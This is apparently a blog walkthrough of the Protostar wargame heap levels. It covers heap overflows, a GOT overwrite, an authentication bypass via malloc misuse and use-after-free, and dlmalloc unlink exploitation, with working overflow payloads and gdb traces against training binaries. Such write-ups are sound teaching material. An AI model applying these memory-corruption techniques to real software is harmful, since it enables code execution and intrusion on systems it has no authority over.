exploit exercises - protostar - heap levels

Nytro · May 25, 2014

exploit exercises - protostar - heap levels

Exploit Exercises - Protostar wargame includes a number of carefully prepared exercises to help hone your basic exploitation skills. In this walkthrough I will go over the heap exploitation portion of the wargame.

Spoiler Alert: I would highly recommend you go over the exercises yourself and come back to this article to find possibly different solutions or in case you get stuck.

Table of Contents

    Heap 0
    Heap 1
    Heap 2
        Improper use of malloc() Solution
        Stale Pointer Solution (aka Use-After-Free)
    Heap 3
        Heap Layout
        Heap Binning
        Heap Unlinking
        Heap Unlinking Exploitation
            Virtual Previous Chunk
            Selecting forward and backward links
            Virtual Next Chunk(s)
            Finalizing the exploit
    External Links and References
    Special Note

Heap 0

The first exercise illustrates a simple heap overflow with a challenge to overwrite a function pointer stored on the heap:

0x0804849c <main+16>:   call   0x8048388 <malloc@plt>    ; d = malloc(64)
0x080484a1 <main+21>:   mov    DWORD PTR [esp+0x18],eax  ; store pointer
0x080484a5 <main+25>:   mov    DWORD PTR [esp],0x4
0x080484ac <main+32>:   call   0x8048388 <malloc@plt>    ; f = malloc(4)
0x080484b1 <main+37>:   mov    DWORD PTR [esp+0x1c],eax  ; store pointer
0x080484b5 <main+41>:   mov    edx,0x8048478
0x080484ba <main+46>:   mov    eax,DWORD PTR [esp+0x1c]
0x080484be <main+50>:   mov    DWORD PTR [eax],edx       ; f->fp = nowinner()
  :
  :
0x080484e7 <main+91>:   mov    eax,DWORD PTR [esp+0x18]
0x080484eb <main+95>:   mov    DWORD PTR [esp+0x4],edx
0x080484ef <main+99>:   mov    DWORD PTR [esp],eax
0x080484f2 <main+102>:  call   0x8048368 <strcpy@plt>    ; overflow d
0x080484f7 <main+107>:  mov    eax,DWORD PTR [esp+0x1c]
0x080484fb <main+111>:  mov    eax,DWORD PTR [eax]
0x080484fd <main+113>:  call   eax                       ; nowinner()

The goal is to execute the function winner() once the call eax instruction is executed:

(gdb) p winner
$1 = {void (void)} 0x8048464 <winner>

The application was nice enough to print addresses returned by the two malloc() calls, saving us the effort of tracking those addresses in the debugger:

$ ./heap0 AAAA
data is at 0x804a008, fp is at 0x804a050
level has not been passed

The first exploit payload can be completed by calculating the offset to the next heap chunk and inserting the address of the winner() function:

$ ./heap0 `python -c 'print "A"*72+"\x64\x84\x04\x08"'`
data is at 0x804a008, fp is at 0x804a050
level passed

Heap 1

The next exercise challenges the player to take advantage of several allocated structures to redirect the execution flow. The exercise creates several nested allocations as follows:

0x080484c2 <main+9>:    mov    DWORD PTR [esp],0x8       ; i1 = malloc(8)
0x080484c9 <main+16>:   call   0x80483bc <malloc@plt>
0x080484ce <main+21>:   mov    DWORD PTR [esp+0x14],eax
0x080484d2 <main+25>:   mov    eax,DWORD PTR [esp+0x14]
0x080484d6 <main+29>:   mov    DWORD PTR [eax],0x1       ; priority = 1
0x080484dc <main+35>:   mov    DWORD PTR [esp],0x8
0x080484e3 <main+42>:   call   0x80483bc <malloc@plt>    ; name = malloc(8)
0x080484e8 <main+47>:   mov    edx,eax
0x080484ea <main+49>:   mov    eax,DWORD PTR [esp+0x14]
0x080484ee <main+53>:   mov    DWORD PTR [eax+0x4],edx   ; i1->name
;------------------------------------------------------------------------------
0x080484f1 <main+56>:   mov    DWORD PTR [esp],0x8
0x080484f8 <main+63>:   call   0x80483bc <malloc@plt>    ; i2 = malloc(8)
0x080484fd <main+68>:   mov    DWORD PTR [esp+0x18],eax
0x08048501 <main+72>:   mov    eax,DWORD PTR [esp+0x18]
0x08048505 <main+76>:   mov    DWORD PTR [eax],0x2       ; priority = 2
0x0804850b <main+82>:   mov    DWORD PTR [esp],0x8
0x08048512 <main+89>:   call   0x80483bc <malloc@plt>    ; name = malloc(8)
0x08048517 <main+94>:   mov    edx,eax
0x08048519 <main+96>:   mov    eax,DWORD PTR [esp+0x18]
0x0804851d <main+100>:  mov    DWORD PTR [eax+0x4],edx   ; i2->name

Two strcpy() calls are made in order to populate these structures with user input:

0x08048520 <main+103>:  mov    eax,DWORD PTR [ebp+0xc]
0x08048523 <main+106>:  add    eax,0x4
0x08048526 <main+109>:  mov    eax,DWORD PTR [eax]
0x08048528 <main+111>:  mov    edx,eax
0x0804852a <main+113>:  mov    eax,DWORD PTR [esp+0x14]
0x0804852e <main+117>:  mov    eax,DWORD PTR [eax+0x4]   ; i1->name
0x08048531 <main+120>:  mov    DWORD PTR [esp+0x4],edx
0x08048535 <main+124>:  mov    DWORD PTR [esp],eax
0x08048538 <main+127>:  call   0x804838c <strcpy@plt>    ; strcpy()
;------------------------------------------------------------------------------
0x0804853d <main+132>:  mov    eax,DWORD PTR [ebp+0xc]
0x08048540 <main+135>:  add    eax,0x8
0x08048543 <main+138>:  mov    eax,DWORD PTR [eax]
0x08048545 <main+140>:  mov    edx,eax
0x08048547 <main+142>:  mov    eax,DWORD PTR [esp+0x18]
0x0804854b <main+146>:  mov    eax,DWORD PTR [eax+0x4]
0x0804854e <main+149>:  mov    DWORD PTR [esp+0x4],edx   ; i2->name
0x08048552 <main+153>:  mov    DWORD PTR [esp],eax
0x08048555 <main+156>:  call   0x804838c <strcpy@plt>    ; strcpy

The last piece of code executed is a simple call to puts():

0x0804855a <main+161>:  mov    DWORD PTR [esp],0x804864b
0x08048561 <main+168>:  call   0x80483cc <puts@plt>      ; puts()

Let's observe where everything got allocated after user data was already copied:

(gdb) break *main+161
Breakpoint 1 at 0x804855a: file heap1/heap1.c, line 34.
(gdb) r AAAAAAAA BBBBBBBB
Starting program: /opt/protostar/bin/heap1 AAAAAAAA BBBBBBBB

Breakpoint 1, main (argc=3, argv=0xbffff834) at heap1/heap1.c:34

(gdb) x/x $esp+0x14        ; i1
0xbffff774:     0x0804a008

(gdb) x/2x 0x0804a008
0x804a008:      0x00000001      0x0804a018
(gdb) x/s 0x0804a018       ; i1->name
0x804a018:       "AAAAAAAA"

(gdb) x/x $esp+0x18        ; i2
0xbffff778:     0x0804a028
(gdb) x/2x 0x0804a028
0x804a028:      0x00000002      0x0804a038
(gdb) x/s 0x0804a038       ; i2->name
0x804a038:       "BBBBBBBB"

An exploit can take advantage of the two writes. The first write can be used to overflow the i1->name member and continue writing until we reach the i2->name in order to populate the pointer with an arbitrary address (e.g. GOT entry for puts()). The second write can be used to fill in the address of the function winner() to complete the challenge.

Let's do a bit of recon on memory addresses to overwrite:

(gdb) x/i 0x80483cc  ; puts()
0x80483cc <puts@plt>:   jmp    DWORD PTR ds:0x8049774
(gdb) x/x 0x8049774
0x8049774 <_GLOBAL_OFFSET_TABLE_+36>:   0x080483d2

Finally, the address of winner() can be simply queried in the debugger:

(gdb) print winner
$1 = {void (void)} 0x8048494 <winner>

We can complete the exploit using the above two memory addesses as follows:

$ ./heap1 `python -c 'print "A"*20+"\x74\x97\x04\x08"+" "+"\x94\x84\x04\x08"'`
and we have a winner @ 1397266680

Heap 2

Stepping away from code execution, Heap2 exercises requires a bypass of a simple authentication system by corrupting a data structure stored on the heap.

Below is the assembly snippet where the flag in the authentication data structure is checked to confirm whether or not the user is logged in using the "login" command:

0x08048a86 <main+338>:  mov    eax,ds:0x804b5f4              ; struct auth *auth
0x08048a8b <main+343>:  mov    eax,DWORD PTR [eax+0x20]      ; auth->auth
0x08048a8e <main+346>:  test   eax,eax
0x08048a90 <main+348>:  je     0x8048aa3 <main+367>          ; if(auth->auth) {
0x08048a92 <main+350>:  mov    DWORD PTR [esp],0x804ada7     ; "you have logged in already!"
0x08048a99 <main+357>:  call   0x804883c <puts@plt>          ; }
0x08048a9e <main+362>:  jmp    0x8048943 <main+15>           ; else {
0x08048aa3 <main+367>:  mov    DWORD PTR [esp],0x804adc3     ; "please enter your password"
0x08048aaa <main+374>:  call   0x804883c <puts@plt>          ; }

In order for the above check to pass, the auth->auth parameter must be set to a non-zero value.

Let's see how the auth struct is initialized using the "auth" command:

0x080489a7 <main+115>:  mov    DWORD PTR [esp],0x4
0x080489ae <main+122>:  call   0x804916a <malloc>            ; malloc heap chunk for auth
0x080489b3 <main+127>:  mov    ds:0x804b5f4,eax
0x080489b8 <main+132>:  mov    eax,ds:0x804b5f4
0x080489bd <main+137>:  mov    DWORD PTR [esp+0x8],0x4   
0x080489c5 <main+145>:  mov    DWORD PTR [esp+0x4],0x0
0x080489cd <main+153>:  mov    DWORD PTR [esp],eax
0x080489d0 <main+156>:  call   0x80487bc <memset@plt>        ; memset auth struct to zero
0x080489d5 <main+161>:  lea    eax,[esp+0x10]                ; get 'auth' command line
0x080489d9 <main+165>:  add    eax,0x5                       ; offset after "auth "
0x080489dc <main+168>:  mov    DWORD PTR [esp],eax
0x080489df <main+171>:  call   0x80487fc <strlen@plt>        ; get string length
0x080489e4 <main+176>:  cmp    eax,0x1e                      ; make sure it's <= 30 bytes
0x080489e7 <main+179>:  ja     0x8048a01 <main+205>                 
0x080489e9 <main+181>:  lea    eax,[esp+0x10]
0x080489ed <main+185>:  lea    edx,[eax+0x5]
0x080489f0 <main+188>:  mov    eax,ds:0x804b5f4
0x080489f5 <main+193>:  mov    DWORD PTR [esp+0x4],edx
0x080489f9 <main+197>:  mov    DWORD PTR [esp],eax
0x080489fc <main+200>:  call   0x804880c <strcpy@plt>        ; copy to auth->name

There are several interesting points in the snippet above:

malloc() is called with a parameter of 4 bytes which is the size of the *auth pointer and not the size of the struct auth. As a result only enough room for the auth->name will be allocated.

The copied string input is explicitly checked to fit in the allocated 4 bytes, so a simple overflow to auth->auth would not work here.

Let's explore another accepted command, "service:

0x08048a4e <main+282>:  lea    eax,[esp+0x10]
0x08048a52 <main+286>:  add    eax,0x7
0x08048a55 <main+289>:  mov    DWORD PTR [esp],eax
0x08048a58 <main+292>:  call   0x804886c <strdup@plt>        ; duplicate string to heap
0x08048a5d <main+297>:  mov    ds:0x804b5f8,eax              ; store address in *service

The last piece of functionality in the challenge is the "reset" command which simply calls free() on the auth struct:

0x08048a21 <main+237>:  mov    eax,ds:0x804b5f4              ; *auth
0x08048a26 <main+242>:  mov    DWORD PTR [esp],eax
0x08048a29 <main+245>:  call   0x804999c <free>              ; free()

Improper use of malloc() Solution

At this point we can analyze how heap memory is allocated in order to write the exploit:

$ ./heap2
[ auth = (nil), service = (nil) ]
auth AAAA
[ auth = 0x804c008, service = (nil) ]
service BBBB
[ auth = 0x804c008, service = 0x804c018 ]
login
please enter your password
[ auth = 0x804c008, service = 0x804c018 ]

Notice that due to the way malloc is called, the next chunk is allocated at 0x804c018. Recall that the application retrieves the pointer to auth->auth at the offset 0x20 relative to the address of auth, in this case the address of auth->auth is 0x804c008 + 0x20 = 0x804c028. As a result of the overlap, if we copy a sufficiently large string (16 bytes or more) using the service command, then the authentication check will pass:

$ ./heap2
[ auth = (nil), service = (nil) ]
auth AAAA
[ auth = 0x804c008, service = (nil) ]
service BBBBBBBBBBBBBBBB
[ auth = 0x804c008, service = 0x804c018 ]
login
you have logged in already!
[ auth = 0x804c008, service = 0x804c018 ]

Stale Pointer Solution (aka Use-After-Free)

This exercise likely had a simple typo that prevented the expected stale pointer solution. A use-after-free vulnerability where the deallocated auth chunk is used by the application resulting in authentication bypass.

The key to exploiting this condition is being able to be able to overwrite the original chunk with our data. Below is an example of the same chunk being allocated after the call to free():

$ ./heap2
[ auth = (nil), service = (nil) ]
auth AAAA
[ auth = 0x804c008, service = (nil) ]
reset
[ auth = 0x804c008, service = (nil) ]
service BBBB
[ auth = 0x804c008, service = 0x804c008 ]

Notice that the address of service is the same as auth. As a result you could craft a valid auth struct which would pass the authenticated test.

Unfortunately, because of the typo strdup() would not be able to reuse the original auth chunk. In the interests of learning I have patched the original binary to allocate the correct 0x24 byte chunk instead as follows:

0x080489a7 <main+115>:  mov    DWORD PTR [esp],0x24 <--- sizeof(struct auth)
0x080489ae <main+122>:  call   0x804916a <malloc>
0x080489b3 <main+127>:  mov    ds:0x804b5f4,eax
0x080489b8 <main+132>:  mov    eax,ds:0x804b5f4
0x080489bd <main+137>:  mov    DWORD PTR [esp+0x8],0x24 <--- sizeof(struct auth)
0x080489c5 <main+145>:  mov    DWORD PTR [esp+0x4],0x0
0x080489cd <main+153>:  mov    DWORD PTR [esp],eax
0x080489d0 <main+156>:  call   0x80487bc <memset@plt>

We can now exploit this vulnerability the way it was intended:

$ ./heap2
[ auth = (nil), service = (nil) ]
auth AAAA
[ auth = 0x804c008, service = (nil) ]
reset
[ auth = 0x804c008, service = (nil) ]
service AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[ auth = 0x804c008, service = 0x804c008 ]
login
you have logged in already!
[ auth = 0x804c008, service = 0x804c008 ]

Heap 3

The last exercise in the heap series introduces the exploitation of the classic Doug Lea Malloc. For the sake of learning, this walkthrough will go in-depth on every aspect of the exploitation process, so feel free to skip ahead if it gets too dense.

Heap Layout

The key to writing an exploit for this exercise is visualizing the layout of chunks in memory and how they can be corrupted.

For example, here is how an allocated chunk looks like:

    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of previous chunk, if allocated            | |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of chunk, in bytes                       |M|P|
      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             User data starts here...                          .
            .                                                               .
            .             (malloc_usable_size() bytes)                      .
            .                                                               |
nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of chunk                                     |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The exercise allocates three 32 byte chunks as follows:

0x08048892 <main+9>:    mov    DWORD PTR [esp],0x20
0x08048899 <main+16>:   call   0x8048ff2 <malloc>        ; a = malloc(32)
0x0804889e <main+21>:   mov    DWORD PTR [esp+0x14],eax
0x080488a2 <main+25>:   mov    DWORD PTR [esp],0x20
0x080488a9 <main+32>:   call   0x8048ff2 <malloc>        ; b = malloc(32)
0x080488ae <main+37>:   mov    DWORD PTR [esp+0x18],eax
0x080488b2 <main+41>:   mov    DWORD PTR [esp],0x20
0x080488b9 <main+48>:   call   0x8048ff2 <malloc>        ; c = malloc(32)
0x080488be <main+53>:   mov    DWORD PTR [esp+0x1c],eax
0x080488c2 <main+57>:   mov    eax,DWORD PTR [ebp+0xc]

Breaking the application immediately after all three malloc() calls, we can observe the heap memory layout:

(gdb) break *main+60
(gdb) r AAAA BBBB CCCC
Starting program: /opt/protostar/bin/heap3 AAAA BBBB CCCC

Breakpoint 1, 0x080488c5 in main (argc=4, argv=0xbffff844) at heap3/heap3.c:20
(gdb) x/3x $esp+0x14
0xbffff784:     0x0804c008      0x0804c030      0x0804c058

                                         +----- size of chunk
(gdb) x/12x 0x0804c008 - 8               |
0x804c000:      0x00000000      0x00000029      0x00000000      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
                                                                         |
                                                  size of next chunk ----+
(gdb) x/12x 0x0804c030 - 8
0x804c028:      0x00000000      0x00000029      0x00000000      0x00000000
0x804c038:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c048:      0x00000000      0x00000000      0x00000000      0x00000029
(gdb) x/12x 0x0804c058 - 8
0x804c050:      0x00000000      0x00000029      0x00000000      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89

Notice that the chunk size 0x29 includes IS_MMAPPED and PREV_INUSE flags as its two least significant bits, so the true size is 0x29 & 0xfc = 0x28 or 40 bytes. This value corresponds to the originally requested 32 bytes + 8 bytes for the header.

After the three strcpy() operations, all of the application's memory chunks get populated with their respective command line parameter:

(gdb) break *main+136
Breakpoint 2 at 0x8048911: file heap3/heap3.c, line 24.
(gdb) c
Breakpoint 2, 0x08048911 in main (argc=4, argv=0xbffff844) at heap3/heap3.c:24
(gdb) x/12x 0x0804c008 - 8
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
(gdb) x/12x 0x0804c030 - 8
0x804c028:      0x00000000      0x00000029      0x42424242      0x00000000
0x804c038:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c048:      0x00000000      0x00000000      0x00000000      0x00000029
(gdb) x/12x 0x0804c058 - 8
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89

At last the program concludes with three consecutive free() calls which deallocate chunks in reverse order:

0x0804890a <main+129>:  mov    eax,DWORD PTR [esp+0x1c]
0x0804890e <main+133>:  mov    DWORD PTR [esp],eax
0x08048911 <main+136>:  call   0x8049824 <free>          ; free(c)
0x08048916 <main+141>:  mov    eax,DWORD PTR [esp+0x18]
0x0804891a <main+145>:  mov    DWORD PTR [esp],eax
0x0804891d <main+148>:  call   0x8049824 <free>          ; free(
0x08048922 <main+153>:  mov    eax,DWORD PTR [esp+0x14]
0x08048926 <main+157>:  mov    DWORD PTR [esp],eax
0x08048929 <main+160>:  call   0x8049824 <free>          ; free(a)

At this point, it is clear that it is easy to overflow all three chunks; however, the exact mechanism to gain code execution will require some work.

Heap Binning

First let's observe what happens to memory after the three free() calls execute.

(gdb) break *main+165
Breakpoint 3 at 0x804892e: file heap3/heap3.c, line 28.
(gdb) c
Breakpoint 3, main (argc=4, argv=0xbffff844) at heap3/heap3.c:28

                          chunk size ----+      +---- forward pointer
                                         |      |
(gdb) x/12x 0x0804c008 - 8               |      |     
0x804c000:      0x00000000      0x00000029      0x0804c028      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
(gdb) x/12x 0x0804c030 - 8
0x804c028:      0x00000000      0x00000029      0x0804c050      0x00000000
0x804c038:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c048:      0x00000000      0x00000000      0x00000000      0x00000029
(gdb) x/12x 0x0804c058 - 8
0x804c050:      0x00000000      0x00000029      0x00000000      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89

It looks like a single linked data structure with forward pointers containing addresses of the next free chunk. Let's look at the disassembly of the free() function to understand what it is doing:

0x804982a <free+6>:     mov    DWORD PTR [ebp-0x38],0x804b160 ; bin
0x8049831 <free+13>:    cmp    DWORD PTR [ebp+0x8],0x0  ; make sure mem != 0
0x8049835 <free+17>:    je     0x8049a89 <free+613>
;------------------------------------------------------------------------------
0x804983b <free+23>:    mov    eax,DWORD PTR [ebp+0x8]  ; mem to free
0x804983e <free+26>:    sub    eax,0x8                  ; chunk = mem - 8;
0x8049841 <free+29>:    mov    DWORD PTR [ebp-0x34],eax ; store chunk
0x8049844 <free+32>:    mov    eax,DWORD PTR [ebp-0x34]
0x8049847 <free+35>:    mov    eax,DWORD PTR [eax+0x4]  ; chunk_size_flags
0x804984a <free+38>:    and    eax,0xfffffffc           ; zero last two flag bits
0x804984d <free+41>:    mov    DWORD PTR [ebp-0x30],eax ; chunk_size
0x8049850 <free+44>:    mov    eax,DWORD PTR [ebp-0x38] ; bin
0x8049853 <free+47>:    mov    eax,DWORD PTR [eax]      ; max bin chunk size (0x49)
0x8049855 <free+49>:    cmp    eax,DWORD PTR [ebp-0x30] ; compare to chunk_size
0x8049858 <free+52>:    jb     0x8049899 <free+117>     ; unsigned comparison
;------------------------------------------------------------------------------
0x804985a <free+54>:    mov    eax,DWORD PTR [ebp-0x38] ; bin
0x804985d <free+57>:    mov    eax,DWORD PTR [eax]      ; bin size threshold
0x804985f <free+59>:    mov    edx,eax
0x8049861 <free+61>:    and    edx,0xfffffffe           ; zero out the last bit
0x8049864 <free+64>:    mov    eax,DWORD PTR [ebp-0x38]
0x8049867 <free+67>:    mov    DWORD PTR [eax],edx      ; update bin size
0x8049869 <free+69>:    mov    eax,DWORD PTR [ebp-0x38]
;------------------------------------------------------------------------------
0x804986c <free+72>:    lea    edx,[eax+0x4]            ; bin base (0x804b164)
0x804986f <free+75>:    mov    eax,DWORD PTR [ebp-0x30] ; chunk_size
0x8049872 <free+78>:    shr    eax,0x3                  ; calculate bin offset
0x8049875 <free+81>:    sub    eax,0x2                  ; based on chunk size.
0x8049878 <free+84>:    shl    eax,0x2                  ; (( 0x28/8 )- 2 )* 4 = 0xc
0x804987b <free+87>:    lea    eax,[edx+eax*1]          ; bin base + 0xc
;------------------------------------------------------------------------------
0x804987e <free+90>:    mov    DWORD PTR [ebp-0x2c],eax ; bin base for size 0x40
0x8049881 <free+93>:    mov    eax,DWORD PTR [ebp-0x2c]
0x8049884 <free+96>:    mov    edx,DWORD PTR [eax]      ; bin head
0x8049886 <free+98>:    mov    eax,DWORD PTR [ebp-0x34] ; chunk
0x8049889 <free+101>:   mov    DWORD PTR [eax+0x8],edx  ; set chunk->fd to bin head
0x804988c <free+104>:   mov    eax,DWORD PTR [ebp-0x2c] ;
0x804988f <free+107>:   mov    edx,DWORD PTR [ebp-0x34]
0x8049892 <free+110>:   mov    DWORD PTR [eax],edx      ; bin head = chunk
0x8049894 <free+112>:   jmp    0x8049a89 <free+613>

  :

0x8049a89 <free+613>:   leave

Studying the above disassembly, you can see that freed chunks smaller than 64 bytes are placed into a single-linked list. The list itself is placed at a calculated location in a bin data structure. All this extra infrastructure offers increased performance and reduced fragmentation when dealing with small (<64 bytes) chunks. Imagine if you need to allocate another 32 byte chunk. The allocator would quickly check the appropriate bin that has a linked list of free 32 byte chunks and provide you with the address to use.

After the completion of all three frees, the 40 byte chunk bin will contain the address of the original Chunk A:

(gdb) x/x 0x804b170
0x804b170 <av_+16>:     0x0804c000

Now as educational as it was to study how malloc bins work the actual exploitation would require at least one more allocation. With a hypothetical allocation, we could provide an overflown forward pointer which may allow us to corrupt memory once the allocator attempts to relink the chain. Unfortunately, this scenario is not applicable in this case so we must seek an alternative path.

Heap Unlinking

Looking at the code path that malloc took in the previous section, we can see that a huge chunk of code was skipped because the chunk size was < 64 bytes:

0x8049853 <free+47>:    mov    eax,DWORD PTR [eax]      ; max bin chunk size (0x49)
0x8049855 <free+49>:    cmp    eax,DWORD PTR [ebp-0x30] ; compare to chunk_size
0x8049858 <free+52>:    jb     0x8049899 <free+117>     ; unsigned comparison

Let's reverse engineer the code flow in case the jump did take place (for chunks larger than 64 bytes):

0x8049899 <free+117>:   mov    eax,DWORD PTR [ebp-0x34] ; chunk
0x804989c <free+120>:   mov    eax,DWORD PTR [eax+0x4]  ; chunk_size_flags
0x804989f <free+123>:   and    eax,0x2                  ; IS_MMAPPED
0x80498a2 <free+126>:   test   eax,eax                  ; check flag
0x80498a4 <free+128>:   jne    0x8049a2c <free+520>     ; jump if the flag is set
;------------------------------------------------------------------------------
0x80498aa <free+134>:   mov    eax,DWORD PTR [ebp-0x30] ; chunk_size
0x80498ad <free+137>:   mov    edx,DWORD PTR [ebp-0x34] ; chunk
0x80498b0 <free+140>:   lea    eax,[edx+eax*1]          ; next_chunk
0x80498b3 <free+143>:   mov    DWORD PTR [ebp-0x28],eax ; store next_chunk
0x80498b6 <free+146>:   mov    eax,DWORD PTR [ebp-0x28]
0x80498b9 <free+149>:   mov    eax,DWORD PTR [eax+0x4]  ; next_chunk_size_flags
0x80498bc <free+152>:   and    eax,0xfffffffc           ; zero last two flag bits
0x80498bf <free+155>:   mov    DWORD PTR [ebp-0x24],eax ; next_chunk_size
;------------------------------------------------------------------------------
0x80498c2 <free+158>:   mov    eax,DWORD PTR [ebp-0x34] ; chunk
0x80498c5 <free+161>:   mov    eax,DWORD PTR [eax+0x4]  ; chunk_size
0x80498c8 <free+164>:   and    eax,0x1                  ; PREV_INUSE flag
0x80498cb <free+167>:   test   eax,eax                  ; check the flag
0x80498cd <free+169>:   jne    0x8049909 <free+229>     ; jump if the flag is set

Pretty boring so far. A check is done to see whether the two least significant bits are set in the chunk size and jump way down if that's the case. As previously mentioned, the two bits correspond to IS_MMAPPED and PREV_INUSE flags. Recall that the size field of our three chunks was set to 0x29 meaning that the least significant bits were indeed set (PREV_INUSE). So even if we somehow made a chunk appear larger than 64 bytes, we would still have jump to <free+229>.

Imagine that there is a way to bypass both of these jumps and continue executing as if neither of the two flags were set:

0x80498cf <free+171>:   mov    eax,DWORD PTR [ebp-0x34] ; chunk
0x80498d2 <free+174>:   mov    eax,DWORD PTR [eax]      ; prev_chunk_size
0x80498d4 <free+176>:   mov    DWORD PTR [ebp-0x1c],eax
0x80498d7 <free+179>:   mov    eax,DWORD PTR [ebp-0x1c]
0x80498da <free+182>:   add    DWORD PTR [ebp-0x30],eax ; chunk_size
0x80498dd <free+185>:   mov    eax,DWORD PTR [ebp-0x1c]
0x80498e0 <free+188>:   neg    eax                      ; -prev_chunk_size
0x80498e2 <free+190>:   add    DWORD PTR [ebp-0x34],eax ; prev_chunk = 
                                                        ; chunk+(-prev_chunk_size)
0x80498e5 <free+193>:   mov    eax,DWORD PTR [ebp-0x34] ; store prev_chunk
0x80498e8 <free+196>:   mov    eax,DWORD PTR [eax+0x8]  ; prev_chunk->fd
0x80498eb <free+199>:   mov    DWORD PTR [ebp-0x14],eax 
0x80498ee <free+202>:   mov    eax,DWORD PTR [ebp-0x34]
0x80498f1 <free+205>:   mov    eax,DWORD PTR [eax+0xc]  ; prev_chunk->bk
0x80498f4 <free+208>:   mov    DWORD PTR [ebp-0x18],eax

0x80498f7 <free+211>:   mov    eax,DWORD PTR [ebp-0x14] ; FD
0x80498fa <free+214>:   mov    edx,DWORD PTR [ebp-0x18] ; BK
0x80498fd <free+217>:   mov    DWORD PTR [eax+0xc],edx  ; FD->bk = BK
0x8049900 <free+220>:   mov    eax,DWORD PTR [ebp-0x18] ; BK
0x8049903 <free+223>:   mov    edx,DWORD PTR [ebp-0x14] ; FD
0x8049906 <free+226>:   mov    DWORD PTR [eax+0x8],edx  ; BK->fk = FD

Now it's getting exciting, allow me to explain why =). Toward the bottom of the disassembly there are two memory writes that perform chunk unlinking as part of backward chunk consolidation. Both of the memory writes use source and destination addresses stored in the chunk headers, specifically chunk forward and backward pointers. Recall that we can overflow chunks at will with the three gets() calls and as a result we may be able to control the addresses used above to make an arbitrary write.

Heap Unlinking Exploitation

In order to reach the "interesting" code block at <free+211> we must be able to create a chunk with the size satisfying the following parameters:

Must be greater than 64 (unsigned comparison)

Last two bits must be set to 0

The following payload can overwrite the adjacent chunk's size parameter to satisfy these requirements:

(gdb) r AAAA `python -c 'print "B"*32 + "CCCC" + "\xf0"'` CCCC

It is useful to visualize heap chunks in memory:

 /------ Chunk A -------\ /------ Chunk B -------\ /------ Chunk C -------\
+----+----+--------------+----+----+--------------+----+----+--------------+
|    |    | AAAA         |    |    | BBBB...  BBBB|CCCC|\xf0| CCCC         |
+----+----+--------------+----+----+--------------+----+----+--------------+
                                                     |    |
                               previous chunk size --+    +-- chunk size

Chunk B was overflown into Chunk C to replace previous size value with 0x43434343 and the actual chunk size with \xf0. The value \xf0 can be replaced with any other value subject to the aforementioned conditions. Once free© is called, the jump at <free+52> would no longer take place and we would start executing the "interesting" branch.

Virtual Previous Chunk

Next we need to direct the code to use the fake forward and backward pointers from the user controlled memory area. Thus we need to create a virtual chunk that replicates the following free chunk structure:

    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of previous chunk                            |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    `head:' |             Size of chunk, in bytes                       |M|P|
      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Forward pointer to next chunk in list             |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Back pointer to previous chunk in list            |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Unused space (may be 0 bytes long)                .
            .                                                               .
            .                                                               |
nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    `foot:' |             Size of chunk, in bytes                           |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Recall from the disassembly above that the forward and backward pointers are taken from a previous chunk. The location of the previous chunk is calculated by subtracting the size of the previous chunk from the current chunk's pointer. Ideally, if we could write the value 0x20 (32), then the previous chunk would have been calculated exactly into the Chunk B which contains the two fake forward and backward pointers. Unfortunately there is no way to do this without introducing null bytes and terminating the string before overwriting the Chunk C's size. If we can't move backward, then we can certainly move forward using a negative value:

                             previous chunk size (-4) --+     +-- chunk size (\xf0)
                                                        |     |
(gdb) r AAAA `python -c 'print "B"*32 + "\xfc\xff\xff\xff" + "\xf0"'` CCCCDDDDEEEE
                                                                            |  |
                                                                       fd --+  |
                                                                               |
                                                                          bk --+

Program received signal SIGSEGV, Segmentation fault.

0x080498fd in free (mem=0x804c058) at common/malloc.c:3638

(gdb) x/i $eip
0x80498fd <free+217>:   mov    DWORD PTR [eax+0xc],edx
(gdb) i r eax edx
eax            0x44444444       1145324612
edx            0x45454545       1162167621

